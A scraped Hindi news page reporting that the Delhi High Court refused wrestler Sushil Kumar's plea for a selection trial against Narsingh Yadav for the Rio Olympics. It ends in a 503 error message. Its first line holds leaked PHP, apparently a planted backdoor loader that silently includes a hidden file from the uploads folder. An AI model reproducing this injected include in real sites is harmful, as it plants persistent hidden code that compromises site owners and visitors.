add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पहलवान सुशील कुमार को लगा हाई कोर्ट से झटका, टूटा रियो ओलंपिक में शामिल होने का सपना – SOCH INDIA
Menu

खेल
पहलवान सुशील कुमार को लगा हाई कोर्ट से झटका, टूटा रियो ओलंपिक में शामिल होने का सपना

nobanner

पहलवान सुशील कुमार को नहीं मिली राहत
रियो ओलंपिक में भागीदारी को लेकर कानूनी लड़ाई लड़ रहे पहलवान सुशील कुमार को दिल्ली हाई कोर्ट से राहत नहीं मिली है. कोर्ट ने कहा कि वह फेडरेशन के फैसले में दखल नहीं देगा. कोर्ट का फैसला सुनने के बाद सुशील कुमार के वकील ने कोर्ट को कहा कि उन्हें अपनी याचिका वापस लेने दी जाए लेकिन कोर्ट ने कहा कि अब आर्डर साइन हो चुका है लिहाजा याचिका अब वापस नहीं की जा सकती.

दलीलें सुनने के बाद कोर्ट ने कहा, ‘सुशील महान खिलाडी है, लेकिन रेसलिंग फेडरेशन के इस तर्क को खारिज नहीं किया जा सकता कि नरसिंह यादव बेहतर फॉर्म में हैं और उन्हें ओलंपिक में भेजने का फैसला सही है.’

सुशील कुमार ने लगाया था आरोप
सुशील कुमार ने याचिका दी थी कि रियो ओलंपिक के लिए चुने गए नरसिंह यादव के साथ ओलंपिक में जाने से पहले दोनों का मुकाबला कराया जाए. सुशील का आरोप था कि रेसलिंग फेडरेशन ने भेदभाव से नरसिंह यादव को सेलेक्ट किया है.

दिल्ली हाई कोर्ट के सोमवार के आदेश के बाद साफ हो गया कि पहलवान सुशील कुमार और नरसिंह यादव के बीच रियो ओलंपिक में भारत के तरफ से कौन जाएगा.

C

सुशील ने भारतीय खिलाड़ियों के साथ नहीं की थी प्रैक्टिस
पिछले 2 हफ्ते के दौरान चली सुनवाई में इस ट्रायल के दावेदार के तौर पर सुशील और नरसिंह ने कोर्ट में भी मजबूती के अपना पक्ष रखा. सुनवाई के दौरान कोर्ट रेसलिंग फेडरेशन के वाइस प्रेसिडेंट राज सिंह के हलफनामे में दी गलत जानकारी से नाराज दिखा, तो यह बात भी सामने आई कि भारत सरकार के खर्चे पर जॉर्जिया गए सुशील ने भारतीय खिलाड़ियों के साथ प्रैक्टिस नहीं की. वे वहां जॉर्जिया के खिलाड़ियों के साथ प्रैक्टिस कर रहे थे जो नियमों के खिलाफ है.

हाई कोर्ट ने जताई नाराजगी
हाई कोर्ट इस बात से भी नाराज दिखा कि रेसलिंग फेडरेशन और खिलाड़ियों की राजनीति को कोर्ट में घसीटा जा रहा है. जबकि इस वक्त उन्हें अपने खेल पर ध्यान देना चाहिए था. सुशील के वकील ने कोर्ट को कहा कि इंटरनेशनल रेसलिंग में सुशील के कामयाब होने के चांस ज्यादा हैं. वो अकेला भारतीय रेसलर है जिसने गोल्ड मेडल भारत के लिए जीता है. नरसिंह के पास वो अनुभव नहीं है जो सुशील के पास है, इसलिए अगर रियो ओलंपिक में सुशील को भेजा जाता है, तो भारत के जीतने के चांस बढ़ जाएंगे.

×
सुशील के वकील ने फेडरेशन को घेरा
वकील ने यह भी कहा कि रेसलिंग फेडरेशन के नियमों के हिसाब से भी 1 महीने पहले ट्रायल जरुरी है. ट्रायल 13 महीने पहले कराया गया है, जिसकी कोई वैधता नहीं है. सुशील कुमार को ओलंपिक से दूर कैसे रखा जा सकता है, अगर उसने किसी प्राइवेट चैंपियनशिप में भाग लेने से मना कर दिया है तो ये ओलंपिक में जगह बनाने की शर्त नहीं हो सकती.

फेडरेशन ने नरसिंह को बताया बेहतर
रेसलिंग फेडरेशन ने कहा कि 2015 से सुशील कुमार ने किसी ट्रायल में भाग ही नहीं लिया. सुशील कुमार की तैयारी नरसिंह यादव से बेहतर नहीं है. नरसिंह यादव सितंबर 2015 से तैयारी कर रहा है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.